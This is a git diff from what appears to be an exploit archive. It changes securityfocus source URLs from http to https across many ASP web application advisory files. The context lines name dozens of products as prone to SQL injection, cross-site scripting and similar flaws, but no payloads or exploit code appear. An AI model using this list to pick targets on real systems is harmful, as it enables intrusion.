6f067319f..208f9c5cc 100644 --- a/exploits/asp/webapps/29958.txt +++ b/exploits/asp/webapps/29958.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23850/info +source: https://www.securityfocus.com/bid/23850/info fipsCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30048.html b/exploits/asp/webapps/30048.html index 1f5ac13fc..d990e2736 100644 --- a/exploits/asp/webapps/30048.html +++ b/exploits/asp/webapps/30048.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24033/info +source: https://www.securityfocus.com/bid/24033/info VP-ASP Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30077.txt b/exploits/asp/webapps/30077.txt index 9eeeeea63..11fa7bda6 100644 --- a/exploits/asp/webapps/30077.txt +++ b/exploits/asp/webapps/30077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24119/info +source: https://www.securityfocus.com/bid/24119/info Cisco CallManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/30141.txt b/exploits/asp/webapps/30141.txt index 62ec55bcf..553088528 100644 --- a/exploits/asp/webapps/30141.txt +++ b/exploits/asp/webapps/30141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24288/info +source: https://www.securityfocus.com/bid/24288/info Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30159.txt b/exploits/asp/webapps/30159.txt index 1c7eb1a0f..dd7cc7de8 100644 --- a/exploits/asp/webapps/30159.txt +++ b/exploits/asp/webapps/30159.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24345/info +source: https://www.securityfocus.com/bid/24345/info ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/30165.txt b/exploits/asp/webapps/30165.txt index fca313069..08caea230 100644 --- a/exploits/asp/webapps/30165.txt +++ b/exploits/asp/webapps/30165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24379/info +source: https://www.securityfocus.com/bid/24379/info Ibrahim Ã?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30198.txt b/exploits/asp/webapps/30198.txt index 567ee2340..bcd095970 100644 --- a/exploits/asp/webapps/30198.txt +++ b/exploits/asp/webapps/30198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24515/info +source: https://www.securityfocus.com/bid/24515/info TDizin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30203.txt b/exploits/asp/webapps/30203.txt index d9590dd69..c44bf8d67 100644 --- a/exploits/asp/webapps/30203.txt +++ b/exploits/asp/webapps/30203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24562/info +source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. diff --git a/exploits/asp/webapps/30204.txt b/exploits/asp/webapps/30204.txt index 81e6260d2..190c7230e 100644 --- a/exploits/asp/webapps/30204.txt +++ b/exploits/asp/webapps/30204.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24562/info +source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. diff --git a/exploits/asp/webapps/30205.txt b/exploits/asp/webapps/30205.txt index dd0143493..88adb5c9b 100644 --- a/exploits/asp/webapps/30205.txt +++ b/exploits/asp/webapps/30205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24562/info +source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. diff --git a/exploits/asp/webapps/30207.txt b/exploits/asp/webapps/30207.txt index 1fc2538c4..d049ac376 100644 --- a/exploits/asp/webapps/30207.txt +++ b/exploits/asp/webapps/30207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24563/info +source: https://www.securityfocus.com/bid/24563/info FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/30250.txt b/exploits/asp/webapps/30250.txt index 613f5ca3c..d7d079c69 100644 --- a/exploits/asp/webapps/30250.txt +++ b/exploits/asp/webapps/30250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24637/info +source: https://www.securityfocus.com/bid/24637/info DUClassmate is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30282.txt b/exploits/asp/webapps/30282.txt index 4d910bf9c..1a0f47df4 100644 --- a/exploits/asp/webapps/30282.txt +++ b/exploits/asp/webapps/30282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24794/info +source: https://www.securityfocus.com/bid/24794/info Levent Veysi Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30289.txt b/exploits/asp/webapps/30289.txt index c525e4796..bba4685c6 100644 --- a/exploits/asp/webapps/30289.txt +++ b/exploits/asp/webapps/30289.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24860/info +source: https://www.securityfocus.com/bid/24860/info enVivo!CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30296.txt b/exploits/asp/webapps/30296.txt index 8596e1a6a..280f1cc4c 100644 --- a/exploits/asp/webapps/30296.txt +++ b/exploits/asp/webapps/30296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24894/info +source: https://www.securityfocus.com/bid/24894/info activeWeb contentserver is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30297.txt b/exploits/asp/webapps/30297.txt index 22b3566b8..42827354f 100644 --- a/exploits/asp/webapps/30297.txt +++ b/exploits/asp/webapps/30297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24895/info +source: https://www.securityfocus.com/bid/24895/info activeWeb contentserver is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30298.txt b/exploits/asp/webapps/30298.txt index 3a2b8b459..cdb0b2739 100644 --- a/exploits/asp/webapps/30298.txt +++ b/exploits/asp/webapps/30298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24895/info +source: https://www.securityfocus.com/bid/24895/info activeWeb contentserver is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30300.txt b/exploits/asp/webapps/30300.txt index 3281c2aed..11d1dbec7 100644 --- a/exploits/asp/webapps/30300.txt +++ b/exploits/asp/webapps/30300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24909/info +source: https://www.securityfocus.com/bid/24909/info MzK Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30313.txt b/exploits/asp/webapps/30313.txt index 4d2a9467d..0c7bddb7d 100644 --- a/exploits/asp/webapps/30313.txt +++ b/exploits/asp/webapps/30313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24923/info +source: https://www.securityfocus.com/bid/24923/info TBDev.NET DR is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/asp/webapps/30316.txt b/exploits/asp/webapps/30316.txt index 66a8523dc..4f02a0e56 100644 --- a/exploits/asp/webapps/30316.txt +++ b/exploits/asp/webapps/30316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24928/info +source: https://www.securityfocus.com/bid/24928/info The 'husrevforum' program is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30327.html b/exploits/asp/webapps/30327.html index 849b94eca..43797ab27 100644 --- a/exploits/asp/webapps/30327.html +++ b/exploits/asp/webapps/30327.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25004/info +source: https://www.securityfocus.com/bid/25004/info Dora Emlak Script is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30328.txt b/exploits/asp/webapps/30328.txt index 0c82704a8..6354761c3 100644 --- a/exploits/asp/webapps/30328.txt +++ b/exploits/asp/webapps/30328.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25005/info +source: https://www.securityfocus.com/bid/25005/info Alisveris Sitesi Scripti is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30330.txt b/exploits/asp/webapps/30330.txt index 22ac6b97a..023f3e4f4 100644 --- a/exploits/asp/webapps/30330.txt +++ b/exploits/asp/webapps/30330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25007/info +source: https://www.securityfocus.com/bid/25007/info Alisveris Sitesi Scripti is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30331.html b/exploits/asp/webapps/30331.html index 2d25030a0..1b3ecb993 100644 --- a/exploits/asp/webapps/30331.html +++ b/exploits/asp/webapps/30331.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25008/info +source: https://www.securityfocus.com/bid/25008/info Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/asp/webapps/30332.txt b/exploits/asp/webapps/30332.txt index 6c1c8d9c0..7a144b0e9 100644 --- a/exploits/asp/webapps/30332.txt +++ b/exploits/asp/webapps/30332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25010/info +source: https://www.securityfocus.com/bid/25010/info Image Racer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30382.txt b/exploits/asp/webapps/30382.txt index 58eaf001b..bedc0821f 100644 --- a/exploits/asp/webapps/30382.txt +++ b/exploits/asp/webapps/30382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25055/info +source: https://www.securityfocus.com/bid/25055/info W1L3D4 Philboard is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30402.txt b/exploits/asp/webapps/30402.txt index a050ad484..1298b1759 100644 --- a/exploits/asp/webapps/30402.txt +++ b/exploits/asp/webapps/30402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25081/info +source: https://www.securityfocus.com/bid/25081/info Nukedit is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30423.txt b/exploits/asp/webapps/30423.txt index 1bc6f12ff..c011d53c4 100644 --- a/exploits/asp/webapps/30423.txt +++ b/exploits/asp/webapps/30423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25096/info +source: https://www.securityfocus.com/bid/25096/info Metyus Forum Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30424.txt b/exploits/asp/webapps/30424.txt index f3ab071f9..aa19db454 100644 --- a/exploits/asp/webapps/30424.txt +++ b/exploits/asp/webapps/30424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25109/info +source: https://www.securityfocus.com/bid/25109/info Berthanas Ziyaretci Defteri is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30425.txt b/exploits/asp/webapps/30425.txt index 9dfa86378..92ddd5848 100644 --- a/exploits/asp/webapps/30425.txt +++ b/exploits/asp/webapps/30425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25112/info +source: https://www.securityfocus.com/bid/25112/info Online Store Application Template is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30426.txt b/exploits/asp/webapps/30426.txt index a739797f2..f22f18e1a 100644 --- a/exploits/asp/webapps/30426.txt +++ b/exploits/asp/webapps/30426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25113/info +source: https://www.securityfocus.com/bid/25113/info Message Board / Threaded Discussion Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30427.txt b/exploits/asp/webapps/30427.txt index ff1033475..15bca5dcc 100644 --- a/exploits/asp/webapps/30427.txt +++ b/exploits/asp/webapps/30427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25114/info +source: https://www.securityfocus.com/bid/25114/info Pay Roll - Time Sheet and Punch Card Application With Web Interface is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30428.txt b/exploits/asp/webapps/30428.txt index e8c9f1fd0..ca57bee6d 100644 --- a/exploits/asp/webapps/30428.txt +++ b/exploits/asp/webapps/30428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25115/info +source: https://www.securityfocus.com/bid/25115/info Real Estate Listing Website Application Template is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30446.txt b/exploits/asp/webapps/30446.txt index 9b5cf4186..26ccb8605 100644 --- a/exploits/asp/webapps/30446.txt +++ b/exploits/asp/webapps/30446.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25185/info +source: https://www.securityfocus.com/bid/25185/info Hunkaray Okul Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30451.txt b/exploits/asp/webapps/30451.txt index bb7d14b92..0b5835ab0 100644 --- a/exploits/asp/webapps/30451.txt +++ b/exploits/asp/webapps/30451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25195/info +source: https://www.securityfocus.com/bid/25195/info Next Gen Portfolio Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30505.txt b/exploits/asp/webapps/30505.txt index 6f205a8e5..69f7100a6 100644 --- a/exploits/asp/webapps/30505.txt +++ b/exploits/asp/webapps/30505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25350/info +source: https://www.securityfocus.com/bid/25350/info Text File Search Classic is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30541.txt b/exploits/asp/webapps/30541.txt index 2e0fc136e..0f4d2cec1 100644 --- a/exploits/asp/webapps/30541.txt +++ b/exploits/asp/webapps/30541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25480/info +source: https://www.securityfocus.com/bid/25480/info Cisco Unified CallManager and Unified Communications Manager are prone to multiple input-validation vulnerabilities because the applications fail to properly sanitize user-supplied input. These issues include a cross-site scripting vulnerability and an SQL-injection vulnerability. diff --git a/exploits/asp/webapps/30545.txt b/exploits/asp/webapps/30545.txt index 41af2b604..f0eface99 100644 --- a/exploits/asp/webapps/30545.txt +++ b/exploits/asp/webapps/30545.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25492/info +source: https://www.securityfocus.com/bid/25492/info Absolute Poll Manager XE is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30564.txt b/exploits/asp/webapps/30564.txt index f3b62ffc2..1990ea1cb 100644 --- a/exploits/asp/webapps/30564.txt +++ b/exploits/asp/webapps/30564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25532/info +source: https://www.securityfocus.com/bid/25532/info E-Smart Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30571.txt b/exploits/asp/webapps/30571.txt index 7f4899e7e..fc85fbdeb 100644 --- a/exploits/asp/webapps/30571.txt +++ b/exploits/asp/webapps/30571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25613/info +source: https://www.securityfocus.com/bid/25613/info Proxy Anket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30621.txt b/exploits/asp/webapps/30621.txt index 6f7b71340..9701d5977 100644 --- a/exploits/asp/webapps/30621.txt +++ b/exploits/asp/webapps/30621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25828/info +source: https://www.securityfocus.com/bid/25828/info Novus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30624.txt b/exploits/asp/webapps/30624.txt index 498e0f490..949293582 100644 --- a/exploits/asp/webapps/30624.txt +++ b/exploits/asp/webapps/30624.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25875/info +source: https://www.securityfocus.com/bid/25875/info Netkamp Emlak Scripti is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues and an SQL-injection issue, because the application fails to sanitize user-supplied input. diff --git a/exploits/asp/webapps/30625.txt b/exploits/asp/webapps/30625.txt index d32196f4b..9e1927561 100644 --- a/exploits/asp/webapps/30625.txt +++ b/exploits/asp/webapps/30625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25880/info +source: https://www.securityfocus.com/bid/25880/info Ohesa Emlak Portal is prone to multiple SQL-injection vulnerabilities because it fails to adequately sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30626.txt b/exploits/asp/webapps/30626.txt index 7084999ba..27aacaff5 100644 --- a/exploits/asp/webapps/30626.txt +++ b/exploits/asp/webapps/30626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25880/info +source: https://www.securityfocus.com/bid/25880/info Ohesa Emlak Portal is prone to multiple SQL-injection vulnerabilities because it fails to adequately sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30629.txt b/exploits/asp/webapps/30629.txt index 3beee561a..ac9b8832c 100644 --- a/exploits/asp/webapps/30629.txt +++ b/exploits/asp/webapps/30629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25884/info +source: https://www.securityfocus.com/bid/25884/info ASP Product Catalog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30696.txt b/exploits/asp/webapps/30696.txt index dd3a0b7f0..7036de46b 100644 --- a/exploits/asp/webapps/30696.txt +++ b/exploits/asp/webapps/30696.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26142/info +source: https://www.securityfocus.com/bid/26142/info SearchSimon Lite is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/30706.txt b/exploits/asp/webapps/30706.txt index 583a8973e..ae4494ebb 100644 --- a/exploits/asp/webapps/30706.txt +++ b/exploits/asp/webapps/30706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26193/info +source: https://www.securityfocus.com/bid/26193/info CodeWidgets Web Based Alpha Tabbed Address Book is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30708.txt b/exploits/asp/webapps/30708.txt index 056f9b32a..b62de5a21 100644 --- a/exploits/asp/webapps/30708.txt +++ b/exploits/asp/webapps/30708.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26207/info +source: https://www.securityfocus.com/bid/26207/info Aleris Web Publishing Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30743.txt b/exploits/asp/webapps/30743.txt index 48d81ee62..a5e9be7f5 100644 --- a/exploits/asp/webapps/30743.txt +++ b/exploits/asp/webapps/30743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26348/info +source: https://www.securityfocus.com/bid/26348/info i-Gallery is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30747.txt b/exploits/asp/webapps/30747.txt index f3eae9794..f37879adb 100644 --- a/exploits/asp/webapps/30747.txt +++ b/exploits/asp/webapps/30747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26379/info +source: https://www.securityfocus.com/bid/26379/info Rapid Classified is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30775.txt b/exploits/asp/webapps/30775.txt index 893dca2ed..881abf432 100644 --- a/exploits/asp/webapps/30775.txt +++ b/exploits/asp/webapps/30775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26479/info +source: https://www.securityfocus.com/bid/26479/info JiRo's Banner System is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30778.txt b/exploits/asp/webapps/30778.txt index cf3335097..9a632ec07 100644 --- a/exploits/asp/webapps/30778.txt +++ b/exploits/asp/webapps/30778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26493/info +source: https://www.securityfocus.com/bid/26493/info Click&BaneX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30793.txt b/exploits/asp/webapps/30793.txt index a64736045..7e9a6ba10 100644 --- a/exploits/asp/webapps/30793.txt +++ b/exploits/asp/webapps/30793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26522/info +source: https://www.securityfocus.com/bid/26522/info Mass Mailer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30794.txt b/exploits/asp/webapps/30794.txt index 898eaa458..6e7844051 100644 --- a/exploits/asp/webapps/30794.txt +++ b/exploits/asp/webapps/30794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26523/info +source: https://www.securityfocus.com/bid/26523/info VUNET Case Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30796.txt b/exploits/asp/webapps/30796.txt index fd48eae73..0dc07a8d8 100644 --- a/exploits/asp/webapps/30796.txt +++ b/exploits/asp/webapps/30796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26526/info +source: https://www.securityfocus.com/bid/26526/info E-vanced Solutions E-vents is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/30800.html b/exploits/asp/webapps/30800.html index 321d29a12..9dc2e1a1a 100644 --- a/exploits/asp/webapps/30800.html +++ b/exploits/asp/webapps/30800.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26552/info +source: https://www.securityfocus.com/bid/26552/info FooSun is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30807.txt b/exploits/asp/webapps/30807.txt index 12faf5cd2..2d98f4db5 100644 --- a/exploits/asp/webapps/30807.txt +++ b/exploits/asp/webapps/30807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26579/info +source: https://www.securityfocus.com/bid/26579/info DWD Realty is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30841.txt b/exploits/asp/webapps/30841.txt index 21bbde50b..8751e7c85 100644 --- a/exploits/asp/webapps/30841.txt +++ b/exploits/asp/webapps/30841.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30842.txt b/exploits/asp/webapps/30842.txt index d74186491..a5272394d 100644 --- a/exploits/asp/webapps/30842.txt +++ b/exploits/asp/webapps/30842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30843.txt b/exploits/asp/webapps/30843.txt index 2f69cd935..bd257fed5 100644 --- a/exploits/asp/webapps/30843.txt +++ b/exploits/asp/webapps/30843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30844.txt b/exploits/asp/webapps/30844.txt index 125fc25be..40c994035 100644 --- a/exploits/asp/webapps/30844.txt +++ b/exploits/asp/webapps/30844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30845.txt b/exploits/asp/webapps/30845.txt index c2b0ac3a2..1ccde614f 100644 --- a/exploits/asp/webapps/30845.txt +++ b/exploits/asp/webapps/30845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30855.txt b/exploits/asp/webapps/30855.txt index bf82dadde..c20f01dbc 100644 --- a/exploits/asp/webapps/30855.txt +++ b/exploits/asp/webapps/30855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26761/info +source: https://www.securityfocus.com/bid/26761/info WebDoc is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30860.txt b/exploits/asp/webapps/30860.txt index dba2c849b..96253f1ad 100644 --- a/exploits/asp/webapps/30860.txt +++ b/exploits/asp/webapps/30860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26790/info +source: https://www.securityfocus.com/bid/26790/info bttlxe Forum is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/30938.txt b/exploits/asp/webapps/30938.txt index 6ae5319aa..1f7e84735 100644 --- a/exploits/asp/webapps/30938.txt +++ b/exploits/asp/webapps/30938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27031/info +source: https://www.securityfocus.com/bid/27031/info Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30940.txt b/exploits/asp/webapps/30940.txt index 295b27367..1f1497b4b 100644 --- a/exploits/asp/webapps/30940.txt +++ b/exploits/asp/webapps/30940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27044/info +source: https://www.securityfocus.com/bid/27044/info iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30941.txt b/exploits/asp/webapps/30941.txt index 7b31c9657..6b219da23 100644 --- a/exploits/asp/webapps/30941.txt +++ b/exploits/asp/webapps/30941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27044/info +source: https://www.securityfocus.com/bid/27044/info iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30963.txt b/exploits/asp/webapps/30963.txt index c2201db38..41d07eb2f 100644 --- a/exploits/asp/webapps/30963.txt +++ b/exploits/asp/webapps/30963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27080/info +source: https://www.securityfocus.com/bid/27080/info InstantSoftwares Dating Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30993.txt b/exploits/asp/webapps/30993.txt index f977632cf..1394fc934 100644 --- a/exploits/asp/webapps/30993.txt +++ b/exploits/asp/webapps/30993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27162/info +source: https://www.securityfocus.com/bid/27162/info Snitz Forums 2000 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31042.txt b/exploits/asp/webapps/31042.txt index 93718b39b..d605c2474 100644 --- a/exploits/asp/webapps/31042.txt +++ b/exploits/asp/webapps/31042.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27368/info +source: https://www.securityfocus.com/bid/27368/info MegaBBS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31055.txt b/exploits/asp/webapps/31055.txt index 6083993cd..ab9311356 100644 --- a/exploits/asp/webapps/31055.txt +++ b/exploits/asp/webapps/31055.txt @@ -1,4 +1,4 @@ -source: 